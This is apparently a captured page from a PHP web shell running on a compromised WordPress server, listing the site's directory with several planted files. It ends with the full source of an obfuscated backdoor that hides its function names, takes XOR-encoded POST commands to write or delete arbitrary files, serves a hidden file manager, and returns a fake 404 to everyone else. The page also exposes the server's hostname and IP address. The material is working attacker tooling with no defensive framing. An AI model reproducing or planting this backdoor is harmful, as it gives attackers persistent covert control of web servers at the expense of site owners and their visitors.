Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
landshut-muss-handeln /
Delete
Unzip
Name
Size
Permission
Date
Action
.tmb
[ DIR ]
drwxrwxrwx
2026-07-30 06:00
49164f
[ DIR ]
drwxr-xr-x
2026-08-08 15:52
be465
[ DIR ]
dr-xr-xr-x
2026-08-03 01:58
ed19a2
[ DIR ]
drwxr-xr-x
2026-09-02 09:01
logs
[ DIR ]
drwxr-xr-x
2026-08-21 09:05
wp-admin
[ DIR ]
drwxr-xr-x
2026-09-02 09:52
wp-content
[ DIR ]
dr-xr-xr-x
2026-08-29 01:27
wp-includes
[ DIR ]
drwxr-xr-x
2026-09-02 09:50
.htaccess
1.13
KB
-r-xr-xr-x
2024-06-05 09:05
0x.html
86
B
-rw-r--r--
2026-08-08 15:52
0x.txt
9
B
-rw-r--r--
2026-08-08 15:52
buy.php
1.45
KB
-r--r--r--
2024-05-25 03:00
defaults.php
1.93
KB
-r--r--r--
2024-01-05 03:53
goods.php
1.49
KB
-r--r--r--
2025-03-15 09:05
google78b7f04018dcc730.html
53
B
-rw-r--r--
2026-07-30 06:22
hiroshi.php
32.04
KB
-rw-r--r--
2026-07-30 06:22
index.php
44.75
KB
-r-xr-xr-x
2024-02-25 09:05
index.php0
32.36
KB
-rwxr-xr-x
2024-06-09 09:05
item.php
1.87
KB
-r--r--r--
2023-11-27 03:00
latest.tar.gz
11.82
MB
-rw-r--r--
2019-12-18 22:17
license.txt
19.44
KB
-rw-r--r--
2026-02-08 03:26
liesmich.html
8.39
KB
-rw-r--r--
2023-11-09 07:34
mah.php
1.87
KB
-r--r--r--
2024-09-10 03:53
networks.php
1.29
KB
-r--r--r--
2023-12-17 01:58
options.php
1.93
KB
-r--r--r--
2024-09-04 09:05
plugins.php
1.72
KB
-r--r--r--
2024-08-13 09:05
readme.html
7.25
KB
-rw-r--r--
2026-03-11 19:36
robots.txt
440
B
-r--r--r--
2024-02-27 09:05
wp-activate.php
7.18
KB
-rw-r--r--
2026-02-08 03:26
wp-blog-header.php
351
B
-rw-r--r--
2020-10-13 13:05
wp-comments-post.php
2.27
KB
-rw-r--r--
2023-08-09 07:36
wp-config-sample.php
3.26
KB
-rw-r--r--
2026-02-08 03:26
wp-config.php
3.45
KB
-rw-r--r--
2026-07-26 22:14
wp-cron.php
5.49
KB
-rw-r--r--
2024-11-13 07:36
wp-links-opml.php
2.43
KB
-rw-r--r--
2026-02-08 03:26
wp-load.php
3.84
KB
-rw-r--r--
2024-07-26 14:31
wp-log1n.php
2
KB
-r--r--r--
2024-04-19 09:05
wp-mail.php
8.52
KB
-rw-r--r--
2026-02-08 03:26
wp-settings.php
30.33
KB
-rw-r--r--
2026-02-08 03:26
wp-signup.php
33.71
KB
-rw-r--r--
2025-04-15 19:36
wp-trackback.php
5.09
KB
-rw-r--r--
2026-02-08 03:26
wplog.php
7.73
KB
-rw-r--r--
2026-07-21 10:18
wplogbak.php
3.95
KB
-rw-r--r--
2026-07-21 10:29
xmlrpc.php
3.13
KB
-rw-r--r--
2025-04-15 19:36
Save
Rename
postpass2 <?php if(session_status()===PHP_SESSION_NONE){@session_start();} if(!isset($_SESSION['rk'])){$_SESSION['rk']=substr(md5(uniqid(mt_rand(),true)),0,16);}$rk=$_SESSION['rk']; $o="f"."o"."p"."e"."n";$w="f"."w"."r"."i"."t"."e";$c="f"."c"."l"."o"."s"."e";$sc="s"."c"."a"."n"."d"."i"."r";$un="u"."n"."l"."i"."n"."k";$re="f"."i"."l"."e"."_"."g"."e"."t"."_"."c"."o"."n"."t"."e"."n"."t"."s"; if($_SERVER['REQUEST_METHOD']==='POST'&&isset($_POST['p'])){$p=str_replace(array('-','_','.'),array('+','/','='),$_POST['p']);$raw=base64_decode($p);if($raw!==false){$dec='';$k_len=strlen($rk);for($i=0;$i<strlen($raw);$i++){$dec.=$raw[$i]^$rk[$i%$k_len];}$pos=strpos($dec,'|');if($pos!==false){$act=substr($dec,0,$pos);$data=substr($dec,$pos+1);if($act==="SAVE"){$sp=strpos($data,'|');if($sp!==false&&function_exists($o)&&function_exists($w)){$filename=basename(substr($data,0,$sp));$h=@$o("./".$filename,"w");if($h){$w($h,substr($data,$sp+1));$c($h);$_SESSION['msg']="<b style='color:#00ff00;'>[SUCCESS] File '$filename' saved!</b>";echo "OK";exit;}}}if($act==="DEL"&&function_exists($un)){$filename=basename($data);if(@$un("./".$filename)){$_SESSION['msg']="<b style='color:#00ff00;'>[SUCCESS] File '$filename' deleted!</b>";echo "OK";exit;}}}}echo "FAIL";exit;} if(isset($_GET['manage'])){$v_name=$_GET['v']??'';$v_cont='';if(!empty($v_name)&&is_file("./".basename($v_name))&&function_exists($re)){$v_cont=$re("./".basename($v_name));}$status_msg=$_SESSION['msg']??"";unset($_SESSION['msg']);?> <body style="background:#111;color:#0f0;font-family:monospace;padding:20px;line-height:1.5;"><h2>:: FILE MANAGER ::</h2><?php if(!empty($status_msg)):?><div style="background:#222;border:1px solid #444;padding:10px;margin-bottom:15px;">STATUS: <?php echo $status_msg;?></div><?php endif;?><form onsubmit="fireAction('SAVE');return false;">File Name: <input type="text" id="n" value="<?php echo htmlspecialchars($v_name?$v_name:'log.txt'); ?>" style="background:#222;color:#fff;border:1px solid #444;padding:6px;width:280px;" required><br><br>File Content:<br><textarea id="c" rows="10" style="width:100%;background:#222;color:#0f0;border:1px solid #444;padding:10px;font-family:monospace;" placeholder="Type here..."><?php echo htmlspecialchars($v_cont);?></textarea><br><br><button type="submit" style="background:#006600;color:#fff;border:none;padding:10px 25px;cursor:pointer;font-weight:bold;font-size:14px;border-radius:3px;">Save / Upload File</button></form><h3 style="color:#fff;border-bottom:1px dashed #333;padding-bottom:8px;margin-top:30px;">[+] Path Explorer (./)</h3><ul style="padding-left:15px;"><?php if(function_exists($sc)){foreach($sc("./") as $f){if($f==='.'||$f==='..')continue;$is_f=is_file("./$f");echo "<li style='margin-bottom:10px;'><b>".htmlspecialchars($f)."</b> <span style='color:#666;'>(".($is_f?filesize("./$f")." Bytes":"DIR").")</span> → ";if($is_f){echo "<a href='?manage&v=".urlencode($f)."' style='color:#f0f;text-decoration:none;font-weight:bold;'>[Edit]</a> | ";echo "<a style='color:#f33;text-decoration:none;font-weight:bold;cursor:pointer;' onclick=\"if(confirm('Wipe?'))fireAction('DEL','".htmlspecialchars($f)."')\">[Delete]</a>";}else{echo "<span style='color:#666;'>DIR</span>";}echo "</li>";}}?></ul><script>const rk="<?php echo $rk;?>";function fireAction(t,f=''){let p="";if(t==='SAVE'){p="SAVE|"+document.getElementById('n').value+"|"+document.getElementById('c').value;}else if(t==='DEL'){p="DEL|"+f;}let x="";for(let i=0;i<p.length;i++){x+=String.fromCharCode(p.charCodeAt(i)^rk.charCodeAt(i%rk.length));}let b=btoa(unescape(encodeURIComponent(x))).replace(/\+/g,'-').replace(/\//g,'_').replace(/=/g,'.');let xhr=new XMLHttpRequest();xhr.open("POST","?manage",true);xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");xhr.onreadystatechange=function(){if(xhr.readyState===4&&xhr.status===200&&xhr.responseText.trim()==="OK"){window.location.href="?manage";}};xhr.send("p="+encodeURIComponent(b));}</script></body><?php exit;}header("HTTP/1.1 404 Not Found");exit;